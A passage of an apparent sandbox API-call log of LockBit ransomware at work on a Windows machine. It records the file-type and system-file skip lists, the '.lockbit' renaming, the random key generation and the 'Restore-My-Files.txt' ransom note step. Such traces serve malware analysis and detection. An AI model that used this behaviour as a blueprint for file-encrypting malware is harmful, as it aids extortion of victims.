[0196.878] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.878] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.879] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.879] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0211949.WMF") returned 1 [0196.879] lstrcmpiW (lpString1="ntldr", lpString2="J0211949.WMF") returned 1 [0196.879] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0211949.WMF") returned 1 [0196.879] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0211949.WMF") returned -1 [0196.879] lstrcmpiW (lpString1="autorun.inf", lpString2="J0211949.WMF") returned -1 [0196.879] lstrcmpiW (lpString1="thumbs.db", lpString2="J0211949.WMF") returned 1 [0196.879] lstrcmpiW (lpString1="iconcache.db", lpString2="J0211949.WMF") returned -1 [0196.880] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.880] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF") returned=".WMF" [0196.880] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.880] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.880] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.881] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.881] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF.lockbit") returned 70 [0196.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0211949.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.882] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.882] malloc (_Size=0x40068) returned 0x3df0008 [0196.882] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=45902) returned 1 [0196.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.883] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.883] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.887] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.887] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.887] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.889] free (_Block=0x1fa2ed8) [0196.890] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0211949.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.890] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.890] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.890] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50527800, ftCreationTime.dwHighDateTime=0x1be5610, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x50527800, ftLastWriteTime.dwHighDateTime=0x1be5610, nFileSizeHigh=0x0, nFileSizeLow=0x11be, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212219.WMF", cAlternateFileName="")) returned 1 [0196.890] lstrcmpiW (lpString1=".", lpString2="J0212219.WMF") returned -1 [0196.890] lstrcmpiW (lpString1="..", lpString2="J0212219.WMF") returned -1 [0196.890] PathFindExtensionW (pszPath="J0212219.WMF") returned=".WMF" [0196.890] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.890] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.891] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.891] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212219.WMF") returned 1 [0196.892] lstrcmpiW (lpString1="ntldr", lpString2="J0212219.WMF") returned 1 [0196.892] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212219.WMF") returned 1 [0196.892] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212219.WMF") returned -1 [0196.892] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212219.WMF") returned -1 [0196.892] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212219.WMF") returned 1 [0196.892] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212219.WMF") returned -1 [0196.892] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.892] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF") returned=".WMF" [0196.892] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.892] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.892] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.893] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.893] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF.lockbit") returned 70 [0196.893] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212219.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.896] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.896] malloc (_Size=0x40068) returned 0x3df0008 [0196.896] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4542) returned 1 [0196.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.898] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.898] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.902] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.902] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.902] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.903] free (_Block=0x1fa2ed8) [0196.903] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212219.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.904] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.904] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.904] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56952400, ftCreationTime.dwHighDateTime=0x1be5611, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x56952400, ftLastWriteTime.dwHighDateTime=0x1be5611, nFileSizeHigh=0x0, nFileSizeLow=0x248e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0212661.WMF", cAlternateFileName="")) returned 1 [0196.904] lstrcmpiW (lpString1=".", lpString2="J0212661.WMF") returned -1 [0196.904] lstrcmpiW (lpString1="..", lpString2="J0212661.WMF") returned -1 [0196.904] PathFindExtensionW (pszPath="J0212661.WMF") returned=".WMF" [0196.904] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.904] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.905] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.905] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0212661.WMF") returned 1 [0196.905] lstrcmpiW (lpString1="ntldr", lpString2="J0212661.WMF") returned 1 [0196.905] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0212661.WMF") returned 1 [0196.905] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0212661.WMF") returned -1 [0196.906] lstrcmpiW (lpString1="autorun.inf", lpString2="J0212661.WMF") returned -1 [0196.906] lstrcmpiW (lpString1="thumbs.db", lpString2="J0212661.WMF") returned 1 [0196.906] lstrcmpiW (lpString1="iconcache.db", lpString2="J0212661.WMF") returned -1 [0196.906] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.906] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF") returned=".WMF" [0196.906] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.906] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.906] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.907] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.907] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.907] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.907] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.907] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.907] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.907] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF.lockbit") returned 70 [0196.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0212661.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0212661.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, 